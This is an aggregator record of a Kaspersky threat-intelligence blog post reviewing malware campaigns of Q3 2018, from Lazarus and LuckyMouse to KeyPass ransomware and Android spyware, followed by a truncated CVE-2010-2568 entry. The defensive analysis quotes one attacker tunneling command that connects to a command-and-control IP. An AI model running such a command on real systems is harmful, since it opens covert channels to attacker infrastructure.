{"id": "SECURELIST:CB1C16F5005991911A147024EB899D0A", "type": "securelist", "bulletinFamily": "blog", "title": "IT threat evolution Q3 2018", "description": "\n\n## Targeted attacks and malware campaigns\n\n### Lazarus targets cryptocurrency exchange\n\nLazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized cryptocurrency trading application that had been recommended to the company over email.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/22090333/180822-applejeus-11.png>)\n\nAn unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again.\n\nIt seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a 'legitimate looking' software update mechanism \u2013 in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack.\n\nThe attackers went the extra mile and developed malware for non-Windows platforms \u2013 they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we've seen this APT group using malware for Mac OS. It would seem that in the chase after advanced users, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.\n\nThis campaign should be a lesson to all of us and a warning to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither a good-looking website, nor a solid company profile, nor digital certificates guarantee the absence of backdoors. Trust has to be earned and proven.\n\nYou can read our Operation AppleJeus report [here](<https://securelist.com/operation-applejeus/87553/>).\n\n### LuckyMouse\n\nSince March 2018, we have found several infections where a previously unknown Trojan was injected into the 'lsass.exe' system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.\n\nThe campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. We believe that the Chinese-speaking threat actor LuckyMouse is responsible for this campaign. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (\"-s rssocks -d 103.75.190[.]28 -e 443\") creates a tunnel to a previously known LuckyMouse command-and-control (C2) server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor.\n\nThe malware consists of three modules: a custom C++ installer, the NDISProxy network filtering driver and a C++ Trojan:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/07123534/180907-LuckyMouse-1.png>)\n\nWe have not seen any indications of spear phishing or watering hole activity. We think the attackers spread their infectors through networks that were already compromised.\n\nThe Trojan is a full-featured RAT capable of executing common tasks such as command execution, and downloading and uploading files. The attackers use it to gather a target's data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and is popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so that the C2 is able to send commands.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/07123555/180907-LuckyMouse-6.png>)\n\nYou can read our LuckyMouse report [here](<https://securelist.com/luckymouse-ndisproxy-driver/87914/>).\n\n### Financial fraud on an industrial scale\n\nUsually, attacks on industrial enterprises are associated with cyber-espionage or sabotage. However, we recently discovered a phishing campaign designed to steal money from such organizations \u2013 primarily manufacturing companies.\n\nThe attackers use standard phishing techniques to lure their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals use legitimate remote administration applications \u2013 either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, then scan for information on current purchases, and financial and accounting software. The attackers then use different ploys to steal company money \u2013 for example, by replacing the banking details in transactions. At the time we published our [report](<https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/>), on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries \u2013 including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.\n\nOur research highlights that even when threat actors use simple techniques and known malware they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems \u2013 using legitimate remote administration software to evade detection by antivirus solutions. Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of company employees and record audio and video using devices connected to infected machines. While the series of attacks targets primarily Russian organizations, the same tactics and tools could be successfully used in attacks against industrial companies anywhere.\n\nYou can find out more about how attackers use remote administration tools to compromise their targets [here](<https://securelist.com/threats-posed-by-using-rats-in-ics/88011/>), and an overview of attacks on ICS systems in the first half of 2018 [here](<https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h1-2018/87913/>).\n\n## Malware stories\n\n### Exploiting the digital gold rush\n\nFor some time now, we've been tracking [a dramatic decline in ransomware and a massive growth in cryptocurrency mining](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>). The number of people who encountered miners grew from 1,899,236 in 2016-17 to 2,735,611 in 2017-18. This is clearly because it's a lucrative activity for cybercriminals \u2013 we estimate that mining botnets generated more than $7,000,000 in the second half of 2017. Not only are we seeing purpose-built cryptocurrency miners, we're also seeing existing malware adding this functionality to their arsenal.\n\nThe ransomware Trojan Rakhni is a case in point. The malware loader chooses which component to install depending on the device. The malware, which we have seen in Russia, Kazakhstan, Ukraine, Germany and India, is distributed through spam mailings with malicious attachments. One of the samples we analysed masquerades as a financial document. When loaded, this appears to be a document viewer. The malware displays an error message explaining why nothing has opened. It then disables Windows Defender and installs forged digital certificates.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/02104541/180702-rakhni-6.png>) \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/02104545/180702-rakhni-7.png>)\n\nThe malware checks to see if there are Bitcoin-related folders on the computer. If there are, it encrypts files and demands a ransom. If not, it installs a cryptocurrency miner. Finally, the malware tries to spread to other computers within the network. You can read our analysis of Rakhni [here](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>).\n\nCybercriminals don't just use malware to cash in on the growing interest in cryptocurrencies; they also use established social engineering techniques to [trick people out of their digital money](<https://securelist.com/in-cryptoland-trust-can-be-costly/86367/>). This includes sending links to phishing scams that mimic the authorization pages of popular crypto exchanges, to trick their victims into giving the scammers access to their crypto exchange account \u2013 and their money. In the first half of 2018, we saw 100,000 of these attempts to redirect people to such fake pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/06154305/180706-cryptoscam-1.png>)\n\nThe same approach is used to gain access to online wallets, where the 'hook' is a warning that the victim will lose money if they don't go through a formal identification process \u2013 the attackers, of course, harvest the details entered by the victim. This method works just as well where the victim is using an offline wallet stored on their computer.\n\nScammers also try to use the speculation around cryptocurrencies to trick people who don't have a wallet: they lure them to fake crypto wallet sites, promising registration bonuses, including cryptocurrency. In some cases, they harvest personal data and redirect the victim to a legitimate site. In others, they open a real wallet for the victim, which is compromised from the outset. Online wallets and exchanges aren't the only focus of the scammers; we have also seen spoof versions of services designed to facilitate transactions with digital coins stored on the victim's computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/06154304/180706-cryptoscam-6.png>)\n\nEarlier this year, we provided some [advice on choosing a crypto wallet](<https://www.kaspersky.com/blog/cryptowallets/22025/>).\n\nWe recently discovered a cryptocurrency miner, named [PowerGhost](<https://securelist.com/a-mining-multitool/86950/>), focused mainly on workstations and servers inside corporate networks \u2013 thereby hoping to commandeer the power of multiple processors in one fell swoop. It's not uncommon to see cybercriminals infect clean software with a malicious miner to promote the spread of their malware. However, the creators of PowerGhost went further, using fileless methods to establish it in a compromised network. PowerGhost tries to log in to network user accounts using WMI (Windows Management Instrumentation), obtaining logins and passwords using the Mimikatz data extraction tool. The malware can also be distributed using the EternalBlue exploit (used last year in the WannaCry and ExPetr outbreaks). Once a device has been infected, PowerGhost tries to enhance its privileges using operating system vulnerabilities. Most of the attacks we've seen so far have been in India, Turkey, Brazil and Colombia.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/25133320/180725-miner-powershell-7.png>)\n\n### KeyPass ransomware\n\nThe number of ransomware attacks has been declining in the last year or so. Nevertheless, this type of malware remains a problem and we continue to see the development of new ransomware families. Early in August, our [anti-ransomware module](<https://www.kaspersky.com/enterprise-security/wiki-section/products/ransomware-protection>) started detecting the '[KeyPass](<https://securelist.com/keypass-ransomware/87412/>)' Trojan. In just two days, we found this malware in more than 20 countries \u2013 Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/13120501/180813-keypass-12.png>)\n\nWe believe that the criminals behind KeyPass use fake installers that download the malware.\n\nKeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files located in directories that are hardcoded in the malware. Encrypted files are given the additional extension 'KEYPASS', and ransom notes called '!!!KEYPASS_DECRYPTION_INFO!!!.txt' are saved in each directory containing encrypted files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/13103319/180813-keypass-5.png>)\n\nThe creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file.\n\nShortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the [JSON](<https://en.wikipedia.org/wiki/JSON>) format. If the C2 is unavailable \u2013 for example, the infected computer is not connected to the internet, or the server is down \u2013 the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, decryption of the victim's files will be trivial.\n\nProbably the most interesting feature of the KeyPass Trojan is its ability to take 'manual control'. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.\n\n### Sextortion with a twist\n\nScams come in many forms, but the people behind them are always on the lookout for ways to lend credibility to the scam and maximise their opportunity to make money. One [recent 'sextortion' scam](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) uses stolen passwords for this purpose. The victim receives an email message claiming that their computer has been compromised and that the attacker has recorded a video of them watching pornographic material. The attackers threaten to send a copy of the video to the victim's contacts unless they pay a ransom within 24 hours. The ransom demand is $1,400, payable in bitcoins.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/10/31090941/sextortion-scam.png>)\n\nThe scammer includes a legitimate password in the message, in a bid to convince the victim that they have indeed been compromised. It seems that the passwords used are real, although in some cases at least they are very old. The passwords were probably obtained in an underground market and came from an earlier data breach.\n\n### The hunt for corporate passwords\n\nIt's not just individuals who are targeted by phishing attacks \u2013 starting from early July, we saw [malicious spam activity targeting corporate mailboxes](<https://securelist.com/loki-bot-stealing-corporate-passwords/87595/>). The messages contained an attachment with an .ISO extension that we detect as Loki Bot. The objective of the malware is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets, and then to forward the data to the criminals behind the attacks.\n\nThe messages are diverse in nature. They include fake notifications from well-known companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28150313/180827-loki-2.png>)\n\nOr fake orders or offers:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28150313/180827-loki-3.png>)\n\nThe scammers pass off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually consisting of no more than a few lines and the subject mentioning the fake attachment.\n\nEach year we see an increase in spam attacks on the corporate sector aimed at obtaining confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That's why it's essential for corporate security strategy to include both technical protection and staff education \u2013 to stop them becoming the entry-point for a cyberattack.\n\n### Botnets: the big picture\n\nSpam mailshots with links to malware, and bots downloading other malware, are just two [botnet](<https://encyclopedia.kaspersky.com/glossary/botnet/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) deployment scenarios. The choice of payload is limited only by the imagination of the botnet operator or their customers. It might be ransomware, a banker, a miner, a backdoor, etc. Every day we intercept numerous file download commands sent to bots of various types and families. We recently presented the results of our analysis of [botnet activity for H2 2017 and H1 2018](<https://securelist.com/what-are-botnets-downloading/87658/>).\n\nHere are the main trends that we identified by analyzing the files downloaded by bots:\n\n * The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for cryptocurrency mining.\n * The number of downloaded droppers is also on the rise, reflecting the fact that attacks are multi-stage and growing in complexity.\n * The share of banking Trojans among bot-downloaded files in 2018 decreased, but it's too soon to speak of an overall reduction in number, since they are often delivered by droppers.\n * Increasingly, botnets are leased according to the needs of the customer, so in many cases it is difficult to pinpoint the 'specialization' of the botnet.\n\n### Using USB devices to spread malware\n\nUSB devices, which have been around for almost 20 years, offer an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors \u2013 most notably in the case of the state-sponsored threat [Stuxnet](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>), which used USB devices to inject malware into the network of an Iranian nuclear facility.\n\nThese days the use of USB devices as a business tool is declining, and there is greater awareness of the security risks associated with them. Nevertheless, millions of USB devices are still produced for use at home, in businesses and in marketing promotion campaigns such as trade show giveaways. So they remain a target for attackers.\n\nKaspersky Lab data for 2017 showed that one in four people worldwide were affected by a local cyber-incident, i.e. one not related to the internet. These attacks are detected directly on a victim's computer and include infections caused by removable media such as USB devices.\n\nWe recently published a [review of the current cyberthreat landscape for removable media, particularly USBs](<https://securelist.com/usb-threats-from-malware-to-miners/87989/>), and offered advice and recommendations for protecting these little devices and the data they carry.\n\nHere is a summary of our findings.\n\n * USB devices and other removable media have been used to spread cryptocurrency mining software since at least 2015. Some victims were found to have been carrying the infection for years.\n * The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.\n * Every tenth person infected via removable media in 2018 was targeted with this cryptocurrency miner: around 9.22% \u2013 up from 6.7% in 2017 and 4.2% in 2016.\n * Other malware spread through removable media includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.\n * The Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.\n * Emerging markets are the most vulnerable to malicious infection spread by removable media \u2013 with Asia, Africa and South America among the most affected \u2013 but isolated hits were also detected in countries in Europe and North America.\n * Dark Tequila, a complex banking malware reported in August 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.\n\n### New trends in the world of IoT threats\n\nThe use of smart devices is increasing. Some [forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggest that by 2020 the number of smart devices will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices \u2013 for example, air conditioning.\n\nMalware for smart devices is increasing not only in quantity but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine cryptocurrency.\n\nYou can read our report on IoT threats [here](<https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/>), including tips on how to reduce the risk of smart devices being infected.\n\n### A look at the Asacub mobile banking Trojan\n\nThe first version of Asacub, which we saw in June 2015, was a basic phishing app: it was able to send a list of the victim's apps, browser history and contact list to a remote C2 server, send SMS messages to a specific phone number and turn off the screen on demand. This mobile Trojan has evolved since then, off the back of a large-scale distribution campaign by its creators in spring and summer 2017), helping it to claim top spot in last year's ranking of mobile banking Trojans \u2013 out-performing other families such as Svpeng and Faketoken. The Trojan has claimed victims in a number of countries, but the latest version steals money from owners of Android devices connected to the mobile banking service of one of Russia's largest banks.\n\nThe malware is spread via an SMS messages containing a link and an offer to view a photo or MMS message. The link directs the victim to a web page containing a similar sentence and a button for downloading the Trojan APK file to the device.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/27104529/180827-asacub-8.png>)\n\nAsacub masquerades as an MMS app or a client of a popular free ads service.\n\nOnce installed, the Trojan starts to communicate with the C2 server. Data is transferred in JSON format and includes information about the victim's device \u2013 smartphone model, operating system, mobile operator and Trojan version.\n\nAsacub is able to withdraw funds from a bank card linked to the phone by sending an SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS messages from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS messages and send them to the required number. What's more, the victim can't subsequently check the balance via mobile banking or change any settings, because after receiving a command with the code 40, the Trojan prevents the banking app from running on the phone.\n\nYou can read more [here](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>).\n\n### BusyGasper \u2013 the unfriendly spy\n\nEarly in 2018, our mobile intruder detection technology was triggered by a suspicious Android sample that turned out to belong to a new spyware family that we named [BusyGasper](<https://securelist.com/busygasper-the-unfriendly-spy/87627/>). The malware isn't sophisticated, but it does demonstrate some unusual features for this type of threat. BusyGasper is a unique spy implant with stand-out features such as device sensor listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol \u2013 about 100 commands \u2013 and an ability to bypass the Doze battery saver. Like other modern Android spyware, it is capable of exfiltrating data from messaging applications \u2013 WhatsApp, Viber and Facebook. It also includes some keylogging tools \u2013 the malware processes every user tap, gathering its co-ordinates and calculating characters by matching given values with hardcoded ones.\n\nThe malware has a multi-component structure and can download a payload or updates from its C2 server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol, which is rarely seen among Android malware. In addition, it can log in to the attacker's email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28151007/180828-busygasper-2.png>)\n\nThere is a hidden menu for controlling the different implants that seems to have been created for manual operator control. To activate the menu, the operator needs to call the hardcoded number 9909 from an infected device.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28151114/180828-busygasper-12.png>)\n\nThe operator can use this interface to type any command. It also shows a current malware log.\n\nThis particular operation has been active since May. We have found no evidence of spear phishing or other common infection method. Some clues, such as the existence of a hidden menu mentioned above, suggest a manual installation method \u2013 the attackers gaining physical access to a victim's device in order to install the malware. This would explain the number of victims \u2013 less than 10 in total, all located in the Russia. There are no similarities to commercial spyware products or to other known spyware variants, which suggests that BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low OPSEC level could indicate that less skilled attackers are behind the malware.\n\n### Thinking outside the [sand]box\n\nOne of the security principles built into the Android operating system is that all apps must be isolated from one another. Each app, along with its private files, operate in 'sandbox' that can't be accessed by other apps. The point is to ensure that, even if a malicious app infiltrates your device, it's unable to access data held by legitimate apps \u2013 for example, the username and password for your online banking app, or your message history. Unsurprisingly, hackers try to find ways to circumvent this protection mechanism.\n\nIn August, at DEF CON 26, Checkpoint researcher, Slava Makkaveev, discussed a new way of escaping the Android sandbox, dubbed a ['Man-in-the-Disk' attack](<https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/>).\n\nAndroid also has a shared external storage, named External Storage. Apps must ask the device owner for permission to access this storage area \u2013 the privileges required are not normally considered dangerous, and nearly every app asks for them, so there is nothing suspicious about the request per se. External storage is used for lots of useful things, such as to exchange files or transfer files between a smartphone and a computer. However, external storage is also often used for temporarily storing data downloaded from the internet. The data is first written to the shared part of the disk, and then transferred to an isolated area that only that particular app can access. For example, an app may temporarily use the area to store supplementary modules that it installs to expand its functionality, additional content such as dictionaries, or updates.\n\nThe problem is that any app with read/write access to the external storage can gain access to the files and modify them, adding something malicious. In a real-life scenario, you may install a seemingly harmless app, such as a game, that may nevertheless infect your smartphone with malware. Slava Makkaveev gave several examples in his DEF CON presentation.\n\nGoogle researchers discovered that [the same method of attack could be applied to the Android version of the popular game, Fortnite](<https://thehackernews.com/2018/08/fortnite-android-app-apk.html>). To download the game, players need to install a helper app first, and it is supposed to download the game files. However, using the Man-in-the-Disk attack, someone can trick the helper into installing a malicious app. Fortnite developers \u2013 Epic Games \u2013 have already issued a new version of the installer. So, if you're a Fortnite player, use version 2.1.0 or later to be sure that you're safe. If you have Fortnite already installed, uninstall it and then reinstall it from scratch using the new version.\n\n### How safe are car sharing apps?\n\nThere has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security \u2013 how safe is the personal information of people using these services?\n\nThe obvious reason why cybercriminals might be interested in car sharing is because they want to ride in someone's car at someone else's expense. But this could be the least likely scenario \u2013 it's a crime that requires a physical point of presence and there are ways to cross check if the person who makes the booking is the one who gets the ride. The selling of hijacked accounts might be a more viable reason \u2013 driven by demand from those who don't have a driving license or who have been refused registration by the car sharing service's security team. Offers of this nature already exist on the market. In addition, if someone manages to hijack someone else's car sharing account, they can track all their trips and steal things that are left behind in the car. Finally, a car that is fraudulently rented in somebody else's name can always be driven to some remote place and cannibalized for spare parts, or used for criminal activity.\n\nWe tested 13 apps to see if their developers have considered security.\n\nFirst, we checked to see if the apps could be launched on an Android device with root privileges and to see how well the code is obfuscated. This is important because most Android apps can be decompiled, their code modified (for example, so that user credentials are sent to a C2 server), then re-assembled, signed with a new certificate and uploaded again to an app store. An attacker on a rooted device can infiltrate the app's process and gain access to authentication data.\n\nSecond, we checked to see if it was possible to create a username and password when using a service. Many services use a person's phone number as their username. This is quite easy for cybercriminals to obtain as people often forget to hide it on social media, while car sharing customers can be identified on social media by their hashtags and photos.\n\nThird, we looked at how the apps work with certificates and if cybercriminals have any chance of launching successful Man-in-the-Middle attacks. We also checked how easy it is to overlay an app's interface with a fake authorization window.\n\nThe results of our tests were not encouraging. It's clear that app developers don't fully understand the current threats to mobile platforms \u2013 this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities \u2013 only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analysed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not only very similar to each other but are actually based on the same code.\n\nYou can read our report [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>), including advice for customers of car sharing services and recommendations for developers of car sharing apps.", "published": "2018-11-12T10:00:24", "modified": "2018-11-12T10:00:24", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://securelist.com/it-threat-evolution-q3-2018/88635/", "reporter": "David Emm", "references": [], "cvelist": ["CVE-2010-2568"], "lastseen": "2018-11-12T10:38:40", "viewCount": 116, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-11-12T10:38:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-2568"]}, {"type": "attackerkb", "idList": ["AKB:01D63072-BA00-4550-BD35-941F73657FDB"]}, {"type": "threatpost", "idList": ["THREATPOST:5202B8AD19491EC98E5A6D0691C3F16C", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:EE3B2C051F98B1FC8B031246AF4EBA62", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:FD55FE2A305AB024AFF39336C3AA9731", "THREATPOST:13BF380EC94838E00D8D4BD43095E77A", "THREATPOST:F3563336B135A1D7C1251AE54FDC6286", "THREATPOST:177DA099F0CCEE2A79F823573B22840A"]}, {"type": "nessus", "idList": ["SMB_KB_2286198.NASL", "SMB_NT_MS10-046.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:902226", "OPENVAS:1361412562310902226"]}, {"type": "canvas", "idList": ["WINDOWS_SHELL_LNK"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS10_046_SHORTCUT_ICON_DLLLOADER", "MSF:EXPLOIT/WINDOWS/SMB/MS10_046_SHORTCUT_ICON_DLLLOADER", "MSF:POST/WINDOWS/GATHER/FORENSICS/FANNY_BMP_CHECK/"]}, {"type": "saint", "idList": ["SAINT:23F1F2BDDAAD19D660289BACF901A811", "SAINT:D73D956898E75970CBB67DF23C41B8A0", "SAINT:0083688CA07FA21D6F4D1102BD0550AB"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:515F885592B6DF57D6F93B1D92D2782D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:91994", "PACKETSTORM:92425"]}, {"type": "cert", "idList": ["VU:824672", "VU:940193"]}, {"type": "securelist", "idList": ["SECURELIST:048C7F20536D86F920F5CE9B67D02D6B", "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11026", "SECURITYVULNS:DOC:24364"]}, {"type": "exploitdb", "idList": ["EDB-ID:16574", "EDB-ID:14403"]}, {"type": "ics", "idList": ["ICSA-10-201-01C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788412", "MYHACK58:62201788476"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B65D62B8E1AD22C908D33D641FD0A55E"]}], "modified": "2018-11-12T10:38:40", "rev": 2}, "vulnersScore": 8.4}, "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:45:00", "description": "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems.\nPer: http://www.microsoft.com/technet/security/advisory/2286198.mspx\r\n\r\nMicrosoft has completed the investigation into a public report of this vulnerability. We have issued MS10-046 to address this issue.\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS10-046.mspx", "edition": 4, "cvss3": {}, "published": "2010-07-22T05:43:00", "title": "CVE-2010-2568", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2568"], "modified": "2019-02-26T14:04:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_2003_server:*", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2010-2568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2568", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:*:x32:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:*:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:gold:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x32:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", 